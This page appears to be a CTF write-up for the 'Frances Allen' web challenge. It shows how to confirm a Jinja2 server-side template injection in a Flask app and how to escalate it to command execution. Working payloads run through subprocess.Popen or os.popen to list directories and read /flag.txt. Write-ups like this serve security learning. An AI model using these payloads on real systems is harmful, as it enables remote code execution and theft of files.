🚩
CTF Writeups
  • CTF Writeups
  • CloudSEK 2023 Writeups
    • Bases
    • Serialization Saga
    • The SHA Juggler
  • Cyber Heroines CTF 2023 Writeups
    • crypto
      • Lenore Blum
      • Sophie Wilson
    • forensics
      • Barbara Liskov
      • Elizabeth Feinler
      • Margaret Hamilton
      • Marian Croak
      • Stephanie Wehner
    • pwn
      • Sally Ride
    • re
      • Anita Borg
    • web
      • Frances Allen
      • Grace Hopper
      • Radia Perlman
      • Shafrira Goldwasser
      • Susan Landau
  • DeconstruCTF 2023 Writeups
    • Gibberish
    • Hash Roll
    • MOVE
    • Magicplay
    • Missing
    • Snowy Rock
    • Space Ahoy
    • Two Paths
    • Very Basic
    • gitcha
    • sweet-nothing
    • where-are-the-cookies
    • why-are-types-weird
  • Digital Defenders CTF 2023
  • ISFCR EC CTF 2023 Writeups
    • Base the Bases
    • CrackMe
    • Device
    • Emoji Man
    • Fast Fernet
    • Hands Up
    • Hot and Cold
    • I walk alone
    • Inception
    • Lucky Guess?
    • Mess
      • chal
    • NotFooter
    • Oink Oink v2
    • Oink Oink v0
    • Oink Oink v1
    • STR
    • Seek The Treasure
    • Standard-bearer
    • Tap The Wire
    • Thomas The Train
    • What You See Is (Not) What You Get
    • Where's My Dog?
    • splitXquest
    • Zip Bomb
  • KICyber CTF 2023 Writeups
    • All Hail Hydra
    • Binary Cryptogram - Unravel the Enigma
    • Breakout - Unleash the Flag
    • Cross Platform Hunt
    • CryptoShift - Decipher the Hidden Message
    • Hidden-Network-Quest
    • MetaQuest
    • No remorse, No regret
    • OTP Portal Intrigue
    • Policy-patrol_IAM
    • Secure-Storage-Showdown
    • The-Forbidden-Telnet-Portal
    • Time Traveler's Git (Part 1)
    • Time Traveler_s Git (Part 2)
    • Time-Capsule
    • Unveiling the Hidden Message
    • Welcome to KICyber CTF
    • XORCrypt: Solitary Cipher
    • Zipper is stuck
  • Snyk Fetch The Flag 2023 Writeups
    • Back The Hawks
    • Beep64
    • Finders Keepers
    • Jott
    • Nine-One-Sixteen
    • Protecting Camp
    • Quick Maths
    • Unhackable Andy II
    • Unhackable Andy
  • YCTF Mini 2023 Writeups
    • Cat's Concert 🎧🎵
    • Death Song
    • Enigmatic Vault
    • Fire Accident
    • Military Spy
    • Movie scene
    • OSINT 1
    • OSINT 2
    • Stego Master
    • Twinkle Twinkle
    • Unchained 1
    • Unchained 2
    • Inception
  • flaws.cloud
  • YCTF-Weekly 2023
    • Week-2
      • Web
        • Cookie
        • Confluence
      • Misc
        • Never Found
Powered by GitBook
On this page
  • Description
  • Challenge URL
  • Solution
  • Final Payload
  • Alternative Payload
  • FLAG
  • References
  1. Cyber Heroines CTF 2023 Writeups
  2. web

Frances Allen

Last updated 1 year ago

Description

Frances Elizabeth Allen (August 4, 1932 – August 4, 2020) was an American computer scientist and pioneer in the field of optimizing compilers. Allen was the first woman to become an IBM Fellow, and in 2006 became the first woman to win the Turing Award. Her achievements include seminal work in compilers, program optimization, and parallelization. She worked for IBM from 1957 to 2002 and subsequently was a Fellow Emerita. - Wikipedia Entry

Chal: Build your best attack against this webapp and inspire the first woman to win the Turing Award

Challenge URL

Challenge Link

Solution

  • Using the Wappalyzer browser extension we can see that the page is using flask.

  • Maybe SSTI?

  • SSTI: A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

  • We can confirm SSTI using {{7*7}}

  • As {{7*7}} returns 49 we can confirm that the page is vulnerable to SSTI and is using the Jinja2 template engine.

Forming the payload

  • call the current class instance using __class__, call this on an empty string

    {{ ''.__class__ }}

  • Use __mro__ to climb up the inherited object tree:

    {{''.__class__.__mro__}}

  • To access the second property in the tuple, use 1:

    {{''.__class__.__mro__[1]}}

  • to climb down the object tree, we use __subclasses__:

    {{''.__class__.__mro__[1].__subclasses__()}}

  • We see that subprocess.Popen is at index 353

  • As it is a list, we can access it using the index. Accessing subprocess module

    {{''.__class__.__mro__[1].__subclasses__()[352]}}

  • Now that we have accessed the subprocess module, we can use it to execute commands and read files on the server.

  • Listing files

    {{''.__class__.__mro__[1].__subclasses__()[352]('ls', shell=True, stdout=-1).communicate()}}

  • Listing files in the root (/) directory, we can see a flag.txt file.

    {{''.__class__.__mro__[1].__subclasses__()[352]('ls /', shell=True, stdout=-1).communicate()}}

  • Reading flag.txt contents

    {{''.__class__.__mro__[1].__subclasses__()[352]('cat /flag.txt', shell=True, stdout=-1).communicate()}}

Final Payload

{{''.__class__.__mro__[1].__subclasses__()[352]('cat /flag.txt', shell=True, stdout=-1).communicate()}}

Alternative Payload

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}

FLAG

chctf{th3re_W4s_n3v3r_a_d0ubt_th4t_1t_w4s_1mp0rt4nt}

References

  • hacktricks

  • PayloadAllTheThings

Copy the output to a text editor and search for subprocess or os and its index.

ssti1
ssti flowchart
subclasses